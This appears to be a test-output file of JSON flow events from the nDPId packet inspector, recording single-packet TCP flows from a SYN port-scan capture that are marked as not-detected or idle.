-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060701,"flow_last_seen":1278275060701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060803,"flow_last_seen":1278275060803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 